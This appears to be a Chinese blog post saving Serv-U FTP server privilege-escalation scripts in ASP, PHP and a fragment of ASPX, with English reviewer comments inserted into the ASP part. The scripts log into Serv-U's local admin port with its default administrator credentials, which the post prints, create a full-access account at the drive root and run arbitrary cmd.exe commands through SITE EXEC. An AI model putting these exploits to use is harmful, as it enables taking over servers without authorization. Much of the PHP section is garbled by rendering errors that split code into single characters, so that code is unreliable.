脚本:网站的编辑语言
serv-u利用脚本(asp/aspx/php)
每次用都得搜,说不准哪天就搜不到了,直接存起来是最好的选择.
<%@ LANGUAGE = VBScript %>
<%
'Serv-U asp 提权程序
'author: Goldsun[at]84823714
'DO NOT use it to do evil things!
' (The header above is Chinese for "Serv-U ASP privilege-escalation program".)
'
' Reviewer summary of what this listing does, for defenders reading it:
' every value it acts on comes straight from the request — an admin port
' ("port"), login credentials ("u"/"p"), a free-text command ("c") and a
' drive path ("f") — and the only destination it ever talks to is 127.0.0.1,
' so the script has to already be running on the Serv-U host (e.g. dropped
' through a web shell).  Apart from "action", nothing is validated.
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
dim action
' "action" chooses the Select Case branch below; anything non-numeric ends
' the response before any work is done.
action=request(“action”)
if not isnumeric(action) then response.end
user = trim(request(“u”))
pass = trim(request(“p”))
port = trim(request(“port”))
cmd = trim(request(“c”))
' Only the first two characters of "f" are kept (presumably drive letter and
' colon).  gpath() is not defined anywhere in this listing — confirm where it
' comes from before assuming the empty-"f" path works.
f=trim(request(“f”))
if f="" then
f=gpath()
else
f=left(f,2)
end if
' Port on which the maintenance commands below create a throw-away domain.
ftpport = 65500
' Assigned but never read anywhere in this listing.
timeout=3
' Text of the FTP login followed by a SITE MAINTENANCE block.  Read as a
' whole it deletes whatever domain sits on ftpport, creates a domain named
' "goldsun" there, and defines user "go" / password "od" with HomeDir and
' Access set to the drive root; "RWAMELCDP" looks like the full set of access
' flags (confirm against Serv-U's documentation).  Creation of an unexpected
' domain on port 65500 and of a user "go" is the artefact a defender would
' look for in Serv-U's configuration and logs.
loginuser = “User " & user & vbCrLf
loginpass = “Pass " & pass & vbCrLf
deldomain = “-DELETEDOMAIN” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & " PortNo=” & ftpport & vbCrLf
mt = “SITE MAINTENANCE” & vbCrLf
newdomain = “-SETDOMAIN” & vbCrLf & “-Domain=goldsun|0.0.0.0|” & ftpport & “|-1|1|0” & vbCrLf & “-TZOEnable=0” & vbCrLf & " TZOKey=” & vbCrLf
newuser = “-SETUSERSETUP” & vbCrLf & “-IP=0.0.0.0” & vbCrLf & “-PortNo=” & ftpport & vbCrLf & “-User=go” & vbCrLf & “-Password=od” & vbCrLf & _
“-HomeDir=c://” & vbCrLf & “-LoginMesFile=” & vbCrLf & “-Disable=0” & vbCrLf & “-RelPaths=1” & vbCrLf & _
“-NeedSecure=0” & vbCrLf & “-HideHidden=0” & vbCrLf & “-AlwaysAllowLogin=0” & vbCrLf & “-ChangePassword=0” & vbCrLf & _
“-QuotaEnable=0” & vbCrLf & “-MaxUsersLoginPerIP=-1” & vbCrLf & “-SpeedLimitUp=0” & vbCrLf & “-SpeedLimitDown=0” & vbCrLf & _
“-MaxNrUsers=-1” & vbCrLf & “-IdleTimeOut=600” & vbCrLf & “-SessionTimeOut=-1” & vbCrLf & “-Expire=0” & vbCrLf & “-RatioUp=1” & vbCrLf & _
“-RatioDown=1” & vbCrLf & “-RatiosCredit=0” & vbCrLf & “-QuotaCurrent=0” & vbCrLf & “-QuotaMaximum=0” & vbCrLf & _
“-Maintenance=System” & vbCrLf & “-PasswordType=Regular” & vbCrLf & “-Ratios=None” & vbCrLf & " Access=c://|RWAMELCDP" & vbCrLf
quit = “QUIT” & vbCrLf
' Swap the hard-coded "c:" in the user definition for the drive taken from "f".
newuser=replace(newuser,“c:”,f)
select case action
case 1
' The whole command text is pushed as the body of an HTTP GET to the
' request-supplied port on localhost.  The open() is asynchronous (True), so
' the script never waits for or inspects a reply; the XMLHTTP object is
' parked in Session so the "case else" branch can abort it later.  On the
' host this shows up as the web-server worker process connecting to a local
' port that is not the web server's own — a useful detection signal.
set a=Server.CreateObject(“Microsoft.XMLHTTP”)
a.open “GET”, “http://127.0.0.1:” & port & “/goldsun/upadmin/s1”,True, “”, “”
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session(“a”)=a
' NOTE(review): the request value "c" is written back into the page below
' without any encoding; it is never sent anywhere in this listing.
%>
<%=cmd%>
<%
case else
' Best-effort cleanup.  "on error resume next" hides every failure here,
' which matters because only session("a") is ever assigned in this listing —
' session("b") and session("c") are Empty, so b.abort / c.abort fail silently.
on error resume next
set a=session(“a”)
set b=session(“b”)
set c=session(“c”)
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
%>
Serv-U 提升权限 ASP版 Goldsun[at]84823714 | |
用户名: | |
口 令: | |
端 口: | |
系统路径: | |
命 令: |
//变量初始化
$addr = ‘0.0.0.0’;
$ftpport = 21;
$adminport = 43958;
$adminuser = ‘LocalAdministrator’;
KaTeX parse error: Expected 'EOF', got '#' at position 14: adminpass = '#̲l@ak#.lk;0@P’;
$user = ‘wofeiwo’;
$password = ‘wrsky’;
$homedir = ‘C://’;
$dir = ‘C://WINNT//System32//’;
//有改变则赋值
if ($_GET){
$addr = $_GET[‘addr’] ;
$ftpport = $_GET[‘ftpport’] ;
$adminport = $_GET[‘adminport’] ;
$adminuser = $_GET[‘adminuser’] ;
$adminpass = $_GET[‘adminpass’] ;
$user = $_GET[‘user’] ;
$password = $_GET[‘password’] ;
$homedir =
G
E
T
[
′
h
o
m
e
d
i
r
′
]
;
i
f
(
_GET['homedir'] ; if (
GET[′homedir′];if(_GET[‘dir’]){
$dir = $_GET[‘dir’] ;
}
}
?>
添加Serv-U用户部分
主机IP: | |
主机Ftp端口: | |
主机Ftp管理端口: | |
主机Ftp管理用户: | |
主机Ftp管理密码: | |
添加的用户名: | |
添加的用户名密码: | |
用户主目录(别忘了写"/"): | |
命令回显: <?php
//添加用户
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …n']=="up"){ up(addr,
f
t
p
p
o
r
t
,
ftpport,
ftpport,adminport,
a
d
m
i
n
u
s
e
r
,
adminuser,
adminuser,adminpass,
u
s
e
r
,
user,
user,password,$homedir);
}
?>
主机Ftp端口: | |
用户名: | |
用户名密码: | |
系统路径(别忘了写"/"): | |
执行的命令: |
命令回显: <?php
//执行命令
if (KaTeX parse error: Expected '}', got 'EOF' at end of input: …cute"){ ftpcmd(ftpport,
u
s
e
r
,
user,
user,password,
d
i
r
,
dir,
dir,_GET[‘cmd’]);
}
?>
//添加用户主函数定义
function up(
a
d
d
r
,
addr,
addr,ftpport,
a
d
m
i
n
p
o
r
t
,
adminport,
adminport,adminuser,
a
d
m
i
n
p
a
s
s
,
adminpass,
adminpass,user,
p
a
s
s
w
o
r
d
,
password,
password,homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno,
e
r
r
s
t
r
,
8
)
;
i
f
(
!
errstr, 8); if (!
errstr,8);if(!fp) {
echo “
e
r
r
s
t
r
(
errstr (
errstr(errno)
/n”;
} else {
fputs (
f
p
,
"
U
S
E
R
"
.
fp, "USER ".
fp,"USER".adminuser."/r/n");
sleep (1);
fputs (
f
p
,
"
P
A
S
S
"
.
fp, "PASS ".
fp,"PASS".adminpass."/r/n");
sleep (1);
fputs (
f
p
,
"
S
I
T
E
M
A
I
N
T
E
N
A
N
C
E
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
fp, "SITE MAINTENANCE/r/n"); sleep (1); fputs (
fp,"SITEMAINTENANCE/r/n");sleep(1);fputs(fp, “-SETUSERSETUP/r/n”);
fputs (
f
p
,
"
−
I
P
=
"
.
fp, "-IP=".
fp,"−IP=".addr."/r/n");
fputs (
f
p
,
"
−
P
o
r
t
N
o
=
"
.
fp, "-PortNo=".
fp,"−PortNo=".ftpport."/r/n");
fputs (
f
p
,
"
−
U
s
e
r
=
"
.
fp, "-User=".
fp,"−User=".user."/r/n");
fputs (
f
p
,
"
−
P
a
s
s
w
o
r
d
=
"
.
fp, "-Password=".
fp,"−Password=".password."/r/n");
fputs (
f
p
,
"
−
H
o
m
e
D
i
r
=
"
.
fp, "-HomeDir=".
fp,"−HomeDir=".homedir."/r/n");
fputs (
f
p
,
"
−
L
o
g
i
n
M
e
s
F
i
l
e
=
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-LoginMesFile=/r/n"); fputs (
fp,"−LoginMesFile=/r/n");fputs(fp, “-Disable=0/r/n”);
fputs (
f
p
,
"
−
R
e
l
P
a
t
h
s
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-RelPaths=0/r/n"); fputs (
fp,"−RelPaths=0/r/n");fputs(fp, “-NeedSecure=0/r/n”);
fputs (
f
p
,
"
−
H
i
d
e
H
i
d
d
e
n
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-HideHidden=0/r/n"); fputs (
fp,"−HideHidden=0/r/n");fputs(fp, “-AlwaysAllowLogin=0/r/n”);
fputs (
f
p
,
"
−
C
h
a
n
g
e
P
a
s
s
w
o
r
d
=
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-ChangePassword=1/r/n"); fputs (
fp,"−ChangePassword=1/r/n");fputs(fp, “-QuotaEnable=0/r/n”);
fputs (
f
p
,
"
−
M
a
x
U
s
e
r
s
L
o
g
i
n
P
e
r
I
P
=
−
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-MaxUsersLoginPerIP=-1/r/n"); fputs (
fp,"−MaxUsersLoginPerIP=−1/r/n");fputs(fp, “-SpeedLimitUp=-1/r/n”);
fputs (
f
p
,
"
−
S
p
e
e
d
L
i
m
i
t
D
o
w
n
=
−
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-SpeedLimitDown=-1/r/n"); fputs (
fp,"−SpeedLimitDown=−1/r/n");fputs(fp, “-MaxNrUsers=-1/r/n”);
fputs (
f
p
,
"
−
I
d
l
e
T
i
m
e
O
u
t
=
600
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-IdleTimeOut=600/r/n"); fputs (
fp,"−IdleTimeOut=600/r/n");fputs(fp, “-SessionTimeOut=-1/r/n”);
fputs (
f
p
,
"
−
E
x
p
i
r
e
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Expire=0/r/n"); fputs (
fp,"−Expire=0/r/n");fputs(fp, “-RatioUp=1/r/n”);
fputs (
f
p
,
"
−
R
a
t
i
o
D
o
w
n
=
1
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-RatioDown=1/r/n"); fputs (
fp,"−RatioDown=1/r/n");fputs(fp, “-RatiosCredit=0/r/n”);
fputs (
f
p
,
"
−
Q
u
o
t
a
C
u
r
r
e
n
t
=
0
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-QuotaCurrent=0/r/n"); fputs (
fp,"−QuotaCurrent=0/r/n");fputs(fp, “-QuotaMaximum=0/r/n”);
fputs (
f
p
,
"
−
M
a
i
n
t
e
n
a
n
c
e
=
S
y
s
t
e
m
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Maintenance=System/r/n"); fputs (
fp,"−Maintenance=System/r/n");fputs(fp, “-PasswordType=Regular/r/n”);
fputs (
f
p
,
"
−
R
a
t
i
o
s
=
N
o
n
e
/
r
/
n
"
)
;
f
p
u
t
s
(
fp, "-Ratios=None/r/n"); fputs (
fp,"−Ratios=None/r/n");fputs(fp, " Access=".
h
o
m
e
d
i
r
.
"
∣
R
W
A
M
E
L
C
D
P
/
r
/
n
"
)
;
f
p
u
t
s
(
homedir."|RWAMELCDP/r/n"); fputs (
homedir."∣RWAMELCDP/r/n");fputs(fp, “QUIT/r/n”);
sleep (1);
while (!feof(KaTeX parse error: Expected '}', got 'EOF' at end of input: … { echo fgets (fp,128);
}
}
}
//执行命令主函数定义
function ftpcmd(
f
t
p
p
o
r
t
,
ftpport,
ftpport,user,
p
a
s
s
w
o
r
d
,
password,
password,dir,$cmd){
$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);
if (!KaTeX parse error: Expected '}', got 'EOF' at end of input: …nn_id) { echo "errstr (KaTeX parse error: Expected 'EOF', got '}' at position 16: errno)<br>/n"; }̲ else { fputs (conn_id, "USER ".
u
s
e
r
.
"
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
user."/r/n"); sleep (1); fputs (
user."/r/n");sleep(1);fputs(conn_id, "PASS ".
p
a
s
s
w
o
r
d
.
"
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
f
p
u
t
s
(
password."/r/n"); sleep (1); fputs (
password."/r/n");sleep(1);fputs(conn_id, “SITE EXEC “.
d
i
r
.
"
c
m
d
.
e
x
e
/
c
"
.
dir."cmd.exe /c ".
dir."cmd.exe/c".cmd.”/r/n”);
fputs (
c
o
n
n
i
d
,
"
Q
U
I
T
/
r
/
n
"
)
;
s
l
e
e
p
(
1
)
;
w
h
i
l
e
(
!
f
e
o
f
(
conn_id, "QUIT/r/n"); sleep (1); while (!feof(
connid,"QUIT/r/n");sleep(1);while(!feof(conn_id)) {
echo fgets (KaTeX parse error: Expected 'EOF', got '}' at position 15: conn_id,128); }̲ fclose(conn_id);
}
}
//去除转义字符
function stripslashes_array(&KaTeX parse error: Expected '}', got 'EOF' at end of input: … { while (list(key,
v
a
r
)
=
e
a
c
h
(
var) = each(
var)=each(array)) {
if ($key != ‘argc’ && KaTeX parse error: Expected 'EOF', got '&' at position 15: key != 'argv' &̲& (strtoupper(key) !=
k
e
y
∣
∣
′
′
.
i
n
t
v
a
l
(
key || ''.intval(
key∣∣′′.intval(key) == "KaTeX parse error: Expected '}', got 'EOF' at end of input: … if (is_string(var)) {
a
r
r
a
y
[
array[
array[key] = stripslashes(KaTeX parse error: Expected 'EOF', got '}' at position 7: var); }̲ if (is_array(var)) {
a
r
r
a
y
[
array[
array[key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>
from Serv-U 2 admin by lake2
Name LocalAdministrator
PWD #l@$ak#.lk;0@P
Port 43958
cmd